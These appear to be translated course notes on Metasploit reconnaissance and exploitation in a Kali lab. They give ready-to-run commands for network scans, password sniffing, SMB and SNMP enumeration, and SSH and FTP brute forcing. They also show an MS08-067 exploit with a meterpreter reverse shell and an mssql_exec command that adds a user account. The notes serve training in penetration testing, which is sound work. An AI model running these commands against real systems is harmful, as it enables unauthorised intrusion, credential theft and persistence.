This article records the detailed process of learning and using Kali Linux 2018.1 and penetration testing. The tutorial is the course "Kali Linux Penetration Testing" in the Security Niu Classroom
Module location:
The modules for information collection are all under auxiliary/scanner/
msf > use auxiliary/scanner/ [TAB] Display all 531 possibilities? (y or n)
1. db_nmap
Like nmap usage, the results are stored in the msf database
msf > db_nmap -sV 10.10.10.0/24
auxiliary directory
RHOSTS <> RHOST
- 192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
- You can also write a list of addresses: file:/root/h.txt
2. Host Discovery Scan
- use auxiliary/scanner/discovery/arp_sweep
set INTERFACE、RHOSTS、SHOST、SMAC、THREADS;run
msf > search arp msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(scanner/discovery/arp_sweep) > show options msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 10.10.10.0/24 msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0 msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 msf auxiliary(scanner/discovery/arp_sweep) > run
3. Port Scan
- use auxiliary/scanner/portscan/syn
set INTERFACE、PORTS、RHOSTS、THREADS;run
msf > search portscan msf > use auxiliary/scanner/portscan/syn msf auxiliary(scanner/portscan/syn) > show options msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0 msf auxiliary(scanner/portscan/syn) > set PORTS 80 msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24 msf auxiliary(scanner/portscan/syn) > set THREADS 50 msf auxiliary(scanner/portscan/syn) > run
4. Zombie scan
Find ipidseq hosts (find zombies)
- use auxiliary/scanner/ip/ipidseq
- set RHOSTS 192.168.1.0/24 ;run
nmap -PN -sI 10.10.10.147 10.10.10.132
msf > use auxiliary/scanner/ip/ipidseq msf auxiliary(scanner/ip/ipidseq) > show options msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150 msf auxiliary(scanner/ip/ipidseq) > set THREADS 20 msf auxiliary(scanner/ip/ipidseq) > run
msf > db_nmap -PN -sI 10.10.10.147 10.10.10.132
5. UDP Scan
- use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_sweep msf auxiliary(scanner/discovery/udp_sweep) > show options msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150 msf auxiliary(scanner/discovery/udp_sweep) > run
msf > use auxiliary/scanner/discovery/udp_probe msf auxiliary(scanner/discovery/udp_probe) > show options msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150 msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131 msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20 msf auxiliary(scanner/discovery/udp_probe) > run
6. Password Sniffing
- use auxiliary/sniffer/psnuffle
- Supports extracting passwords from pacap capture files
- Function similar to dsniff
Currently only supports pop3, imap, ftp, HTTP GET protocols
msf > search sniffer msf > use auxiliary/sniffer/psnuffle msf auxiliary(sniffer/psnuffle) > show options msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0 msf auxiliary(sniffer/psnuffle) > run
root@kali:~# ftp 10.10.10.148
# 继续上述 msf auxiliary(sniffer/psnuffle) > show options msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng msf auxiliary(sniffer/psnuffle) > jobs msf auxiliary(sniffer/psnuffle) > kill 0 msf auxiliary(sniffer/psnuffle) > run
7. SNMP Scanning
- vim /etc/snmp/snmpd.conf (listen replication modified to 0.0.0.0:161)
- use auxiliary/scanner/snmp/snmp_login
- use auxiliary/scanner/snmp/snmp_enum
- use auxiliary/scanner/snmp/snmp_enumusers (windows)
use auxiliary/scanner/snmp/snmp_enumshares (windows)
msf > use auxiliary/scanner/snmp/snmp_login msf auxiliary(scanner/snmp/snmp_login) > show options msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149 msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20 msf auxiliary(scanner/snmp/snmp_login) > run
msf > use auxiliary/scanner/snmp/snmp_enum msf auxiliary(scanner/snmp/snmp_enum) > show options msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149 msf auxiliary(scanner/snmp/snmp_enum) > run
msf > use auxiliary/scanner/snmp/snmp_enum msf auxiliary(scanner/snmp/snmp_enum) > show options msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142 (windows) msf auxiliary(scanner/snmp/snmp_enum) > run msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin (SNMP 服务器团体名) msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20 msf auxiliary(scanner/snmp/snmp_enum) > run
msf > use auxiliary/scanner/snmp/snmp_enumusers msf auxiliary(scanner/snmp/snmp_enumusers) > show options msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares msf auxiliary(scanner/snmp/snmp_enumshares) > show options msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/snmp/snmp_enumshares) > run
8. SMB Scan
SMB version scan
- use auxiliary/scanner/smb/smb_version
Scan command pipeline. Determine the SMB service type (account, password)
- use auxiliary/scanner/smb/pipe_auditor
Scan for RCERPC services accessible through SMB pipes
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB shared account (account, password)
- use auxiliary/scanner/smb/smb_enumshares
SMB user enumeration (account, password)
- use auxiliary/scanner/smb/smb_enumusers
SID enumeration (account, password)
- use auxiliary/scanner/smb/smb_lookupsid
SMB version scan
msf > search smb msf > use auxiliary/scanner/smb/smb_version msf auxiliary(scanner/smb/smb_version) > show options msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.147, 10.10.10.148, 10.10.10.142 msf auxiliary(scanner/smb/smb_version) > run
# 继续上述 msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_version) > run
Scan command pipeline. Determine the SMB service type (account, password)
msf > use auxiliary/scanner/smb/pipe_auditor msf auxiliary(scanner/smb/pipe_auditor) > show options msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/pipe_auditor) > run
# 继续上述 msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
Scan for RCERPC services accessible through SMB pipes
msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
# 继续上述 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456 msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
SMB shared account (account, password)
msf > use auxiliary/scanner/smb/smb_enumshares msf auxiliary(scanner/smb/smb_enumshares) > show options msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/smb_enumshares) > run
# 继续上述 msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_enumshares) > run
SMB user enumeration (account, password)
msf > use auxiliary/scanner/smb/smb_enumusers msf auxiliary(scanner/smb/smb_enumusers) > show options msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148 msf auxiliary(scanner/smb/smb_enumusers) > run
# 继续上述 msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_enumusers) > run
SID enumeration (account, password)
msf > use auxiliary/scanner/smb/smb_lookupsid msf auxiliary(scanner/smb/smb_lookupsid) > show options msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148
# 继续上述 msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456 msf auxiliary(scanner/smb/smb_lookupsid) > run
9. SSH Scan
SSH version scan
- use auxiliary/scanner/ssh/ssh_version
SSH password blasting
- use auxiliary/scanner/ssh/ssh_login
- set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt ;set VERBOSE false ;run
- use auxiliary/scanner/ssh/ssh_login
SSH public key login
- use auxiliary/scanner/ssh/ssh_login_pubkey
- set KEY_FILE id_rsa;set USERNAME root ;run
- use auxiliary/scanner/ssh/ssh_login_pubkey
SSH version scan
msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_version) > run
SSH password blasting
root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false msf auxiliary(scanner/ssh/ssh_login) > run
SSH public key login
msf > use auxiliary/scanner/ssh/ssh_login_pubkey msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
10. Windows missing patches
- Detect based on acquired sessions
use post/windows/gather/enum_patches
- show advanced
- set VERBOSE yes
Check failed
- known bug in WMI query, try migrating to another process
- Migrate to another process and try again
ms08-067
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147 msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp msf exploit(windows/smb/ms08_067_netapi) > run
meterpreter > backgroun msf exploit(windows/smb/ms08_067_netapi) > sessions
msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches msf post(windows/gather/enum_patches) > set SESSION 4 msf post(windows/gather/enum_patches) > run
# 进程错误,迁移进程 msf post(windows/gather/enum_patches) > sessions -i 4 meterpreter > getpid meterpreter > ps meterpreter > migrate 828 # spoolsv.exe meterpreter > background msf post(windows/gather/enum_patches) > run
11. mssql scan
mssql scan port
- TCP 1422 (dynamic port) / UDP 1434 (query TCP port number)
- use auxiliary/scanner/mssql/mssql_ping
Blasting mssql password
- use auxiliary/scanner/mssql/mssql_login
Remote code execution (after obtaining database permissions)
- use auxiliary/admin/mssql/mssql_exec
- set CMD net user user1 pass123 /ADD
mssql scan port
msf > use auxiliary/scanner/mssql/mssql_ping msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142 msf auxiliary(scanner/mssql/mssql_ping) > run
12. FTP Scan
ftp version scan
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ [tab]
- Display all 479 possibilities? (y or n)
Query version information
msf > use auxiliary/scanner/ftp/ftp_version msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ftp/ftp_version) > run
Whether to allow anonymous login
msf > use auxiliary/scanner/ftp/anonymous msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132 msf auxiliary(scanner/ftp/anonymous) > run
Brute force
use auxiliary/scanner/ftp/ftp_login